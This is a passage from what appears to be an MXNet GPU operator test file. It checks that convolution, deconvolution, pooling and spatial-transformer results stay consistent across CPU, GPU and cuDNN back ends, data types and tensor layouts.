{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(1,), pad=(0,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,), pad=(0,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 3D convolution
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed()
def test_conv_deconv_guards():
# Test cases for convolution and deconvolution via strided fft. Ensure that the framework
# guards against problematic CUDNN_CONVOLUTION_BWD_DATA_ALGO_FFT_TILING in cuDNN [7.3.1,7.5)
# see https://docs.nvidia.com/deeplearning/sdk/cudnn-release-notes/rel_750.html#rel_750
tol = 1e-1
for (op, opname) in [(mx.sym.Convolution, 'conv'), (mx.sym.Deconvolution, 'deconv')]:
dataname = opname + '_data'
ctx = {'ctx': mx.gpu(0), dataname: (32, 32, 64, 64), 'type_dict': {dataname: np.float32}}
test_cases = [
{'num_filter':32, 'kernel':(6,6), 'pad':(0,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(6,6), 'pad':(1,1), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(6,7), 'pad':(0,1), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,6), 'pad':(1,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,7), 'pad':(0,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,7), 'pad':(1,1), 'stride':(2,2), 'name': opname}]
for test_case_args in test_cases:
try:
sym = op(**test_case_args)
sym_no_cudnn = op(cudnn_off=True, **test_case_args)
check_consistency([sym, sym_no_cudnn], [ctx, ctx], tol=tol)
except:
print('Test failure of mx.sym.{} with args: {}'.format(op.__name__, test_case_args))
raise
def _conv_with_num_streams(seed):
with random_seed(seed):
# Try to expose timing-dependent improper workspace sharing by parallel dgrad and wgrad
num_trials = 20
for _ in range(num_trials):
size = np.random.randint(32, 128)
# The cudnn conv operator runs dgrad and wgrad in separate streams if enabled, with possible
# kernel overlap. The non-cudnn conv op doesn't do this, so it serves as the 'golden copy'.
ctx = {'ctx': mx.gpu(0), 'conv_data': (2, 2, size, size),
'type_dict': {'conv_data': np.float32}}
# Adding 'flip' here isolates the model from the input node (which can't use inplace store)
flipped = mx.sym.flip(axis=0, name='conv')
sym = mx.sym.Convolution(data=flipped, num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
flipped_no_cudnn = mx.sym.flip(axis=0, name='conv')
sym_no_cudnn = mx.sym.Convolution(data=flipped_no_cudnn, num_filter=3, kernel=(3,3), pad=(1,1),
cudnn_off=True, name='conv')
try:
# tol can be pretty high - we're looking for a large diff due to a corrupted (improperly shared) workspace
check_consistency([sym, sym_no_cudnn], [ctx, ctx], tol=1e-2)
except:
print('Failing conv size = {}'.format(size))
raise
@unittest.skip("skipping for now due to severe flakiness")
@with_seed()
def test_convolution_multiple_streams():
for num_streams in [1, 2]:
for engine in ['NaiveEngine', 'ThreadedEngine', 'ThreadedEnginePerDevice']:
print("Starting engine %s with %d streams." % (engine, num_streams), file=sys.stderr)
run_in_spawned_process(_conv_with_num_streams,
{'MXNET_GPU_WORKER_NSTREAMS' : num_streams, 'MXNET_ENGINE_TYPE' : engine})
print("Finished engine %s with %d streams." % (engine, num_streams), file=sys.stderr)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
def test_convolution_large_c():
problematic_c = 64 * 1024
# The convolution accumulates many values, so set large tolerances.
tol = {np.dtype(np.float32): 1,
np.dtype(np.float64): 1}
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCW', num_filter=8, kernel=(2,), name='conv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCHW', num_filter=4, kernel=(2,2), name='conv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
# Use different data tensor shapes so that cudnnFind() runs multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
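# A minimal numpy sketch of the grad_req semantics that the large-c tests above exercise;
# it is not called by any test and uses plain arrays as stand-ins for real conv gradients.
# grad_req='write' overwrites the gradient buffer (wgrad beta == 0), while grad_req='add'
# accumulates into it (wgrad beta == 1.0f), the mode some cuDNN find() algos mishandle.
def _grad_req_add_sketch():
    existing = np.ones((2, 2), dtype=np.float32)        # gradient already in the buffer
    computed = np.full((2, 2), 0.5, dtype=np.float32)   # gradient from the current backward pass
    write_result = 0.0 * existing + computed            # grad_req='write': beta == 0
    add_result = 1.0 * existing + computed              # grad_req='add':   beta == 1
    assert np.allclose(write_result, 0.5)
    assert np.allclose(add_result, 1.5)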
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
def test_deconvolution_large_c():
problematic_c = 64 * 1024
# The deconvolution accumulates many values, so set large tolerances.
tol = {np.dtype(np.float32): 1,
np.dtype(np.float64): 1}
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCW', num_filter=problematic_c, kernel=(2,), name='deconv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCHW', num_filter=problematic_c, kernel=(2,2), name='deconv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
# Use different data tensor shapes so that cudnnFind() runs multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
@with_seed()
def test_convolution_versions():
# 2D convolution NCHW
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_v1_cpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_v1_gpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
syms = [conv_v1_cpu, conv_v1_gpu, conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# 3D convolution NCDHW
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
syms = [conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# More max-pooling strides and pads to test cudnn pooling implementation code paths
@with_seed()
def test_pooling_nhwc_with_convention():
def make_pooling_syms(**kwargs):
# Conventional NCHW layout pooling
sym = mx.sym.Pooling(**kwargs)
# NHWC pooling
data = mx.sym.Variable('pool_data')
sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1))
sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs)
sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool')
return [sym, sym_nhwc]
# While the float32 and float64 outputs are reliably consistent, float16 departs occasionally.
# We compare nhwc and nchw results only within a given precision.
for in_shape in [(3, 4, 8, 8), (2, 2, 20, 20)]:
for kernel in [(2,2), (3,3), (4,4)]:
for stride in [(1,1), (1,2), (2,1), (2,2)]:
for data_type in [np.float64, np.float32, np.float16]:
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': in_shape,
'type_dict': {'pool_data': data_type}}]
symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride,
pooling_convention='valid', name='pool')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride,
pooling_convention='full', name='pool')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(kernel=(300,300), pool_type='max',
global_pool=True, name='pool')
check_consistency_NxM(symlist, ctx_list)
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='valid', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='full', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(300,300), pool_type='max', global_pool=True, name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
@with_seed()
def test_deconvolution_with_type():
# Test basic deconvolution without exercising stride, pad or dilation.
# 1D deconvolution
sym = mx.sym.Deconvolution(num_filter=3, kernel=(3,), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
# 2D deconvolution
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
@with_seed()
def test_deconvolution_options():
# 1D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # 3D deconvolution (not yet enabled)
# ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# # Pad > 0
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # Stride > 1
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed(1234)
def test_bilinear_sampler_with_type():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym = mx.sym.BilinearSampler(data=data, grid=grid)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float16}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_grid_generator_with_type():
data = mx.sym.Variable('data')
sym = mx.sym.GridGenerator(data=data, transform_type='affine', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.GridGenerator(data=data, transform_type='warp', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_spatial_transformer_with_type():
data = mx.sym.Variable('data')
loc = mx.sym.Flatten(data)
loc = mx.sym.FullyConnected(data=loc, num_hidden=10)
loc = mx.sym.Activation(data=loc, act_type='relu')
loc = mx.sym.FullyConnected(data=loc, num_hidden=6)
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear", cudnn_off=True)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear", cudnn_off=False)
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_pooling_with_type2():
# While the float32 and float64 outputs are reliably consistent, float16 departs occasionally.
# We compare cpu and gpu results only within a given precision.
for data_type in [np.float64, np.float32, np.float16]:
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}]
sym = mx.sym.Pooling(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='sum')
check_consistency(sym, ctx_list)
@with_seed()
def test_pooling_nhwc_with_type():
def make_pooling_syms(**kwargs):
# Conventional NCHW layout pooling
sym = mx.sym.Pooling(**kwargs)
# NHWC pooling
data = mx.sym.Variable('pool_data')
sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1))
sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs)
sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool')
return [sym, sym_nhwc]
# While the float32 and float64 outputs are reliably consistent, float16 departs occasionally.
# We compare nhwc and nchw results only within a given precision.
for data_type in [np.float64, np.float32, np.float16]:
# NHWC pooling only enabled on GPU with CUDNN
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}]
symlist = make_pooling_syms(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
check_consistency_NxM(symlist, ctx_list)
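# A minimal numpy sketch of the layout trick used by make_pooling_syms above (and by the
# transposed pooling paths below): NCHW -> NHWC uses axes (0, 2, 3, 1), the inverse uses
# (0, 3, 1, 2), and applying both transposes restores the original tensor. The helper is
# illustrative only and is not called by any test.
def _nhwc_transpose_sketch():
    x = np.random.rand(2, 3, 4, 5)                  # NCHW
    nhwc = np.transpose(x, (0, 2, 3, 1))            # NHWC
    assert nhwc.shape == (2, 4, 5, 3)
    restored = np.transpose(nhwc, (0, 3, 1, 2))     # back to NCHW
    assert np.array_equal(restored, x)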
@with_seed()
def test_pooling_versions():
# Produce the name of the 'transposed' layout, given the dimension
def transposed_layout(ndim):
if ndim < 3 or ndim > 5:
raise RuntimeError("Invalid data dim, expecting 3, 4 or 5")
return ('NWC', 'NHWC', 'NDHWC')[ndim-3]
# default padding is all zeros
def is_default_pad(pad):
return pad == (0,) * len(pad)
# default stride is all ones
def is_default_stride(stride):
return stride == (1,) * len(stride)
# returns True/False randomly with equal probability
def random_choice():
return np.random.random(1)[0] < 0.5
def test_pooling_versions_helper(pool_op_list, data, kernel, pool_type, pad, stride,
pooling_convention='valid', global_pool=False, p_value=2,
count_include_pad=True, tol=None, dtype=np.float32):
ctx_list = []
sym_list = []
for pool_ctx in pool_op_list:
(pool_op, ctx_type) = pool_ctx.rsplit('_', 1)
expected_ctxs = ['cpu', 'gpu', 'cudnn']
if ctx_type not in expected_ctxs:
raise RuntimeError('Expected one of {}, saw {}.'.format(expected_ctxs, ctx_type))
ctx = mx.cpu(0) if ctx_type == 'cpu' else mx.gpu(0)
ctx_list.append({'ctx': ctx, 'pool_data': data, 'type_dict': {'pool_data': dtype}})
# start with pool args present in all cases
pool_op_args = {'kernel': kernel, 'pool_type': pool_type,
'pooling_convention' : pooling_convention, 'name' : 'pool'}
# add other args as needed
if global_pool:
pool_op_args['global_pool'] = True
else:
# Add pad and stride param if needed, plus randomly when it matches the default
if not is_default_pad(pad) or random_choice():
pool_op_args.update({'pad' : pad})
if not is_default_stride(stride) or random_choice():
pool_op_args.update({'stride' : stride})
expected_pool_ops = ['pool', 'pool_transposed', 'pool_v1']
if pool_op == 'pool_v1':
sym = mx.sym.Pooling_v1(**pool_op_args)
else:
pool_op_args.update({'p_value' : p_value, 'count_include_pad' : count_include_pad})
if ctx_type != 'cpu':
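# ctx_type 'gpu' means the plain (non-cuDNN) GPU kernel, so cudnn_off is True there;
# for ctx_type 'cudnn' the expression evaluates to False and cuDNN stays enabled.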
pool_op_args['cudnn_off'] = ctx_type == 'gpu'
if pool_op == 'pool':
# isolate pooling input from symbol input to test shared tensor optimizations
buffered_input = mx.sym.identity(name='pool')
sym = mx.sym.Pooling(buffered_input, **pool_op_args)
elif pool_op == 'pool_transposed':
ndim = len(data)
# NCW->NWC axes=(0,2,1) NCHW->NHWC axes=(0,2,3,1) NCDHW->NDHWC axes=(0,2,3,4,1);
axes = (0,) + tuple(range(2,ndim)) + (1,)
transposed = mx.sym.transpose(axes=axes, name='pool')
pooled = mx.sym.Pooling(data=transposed, layout=transposed_layout(ndim),
**pool_op_args)
# NWC->NCW axes=(0,2,1) NHWC->NCHW axes=(0,3,1,2) NDHWC->NCDHW axes=(0,4,1,2,3);
axes = (0, ndim-1) + tuple(range(1,ndim-1))
sym = mx.sym.transpose(data=pooled, axes=axes, name='pool')
else:
raise RuntimeError('Expected one of {}, saw {}.'.format(expected_pool_ops,
pool_op))
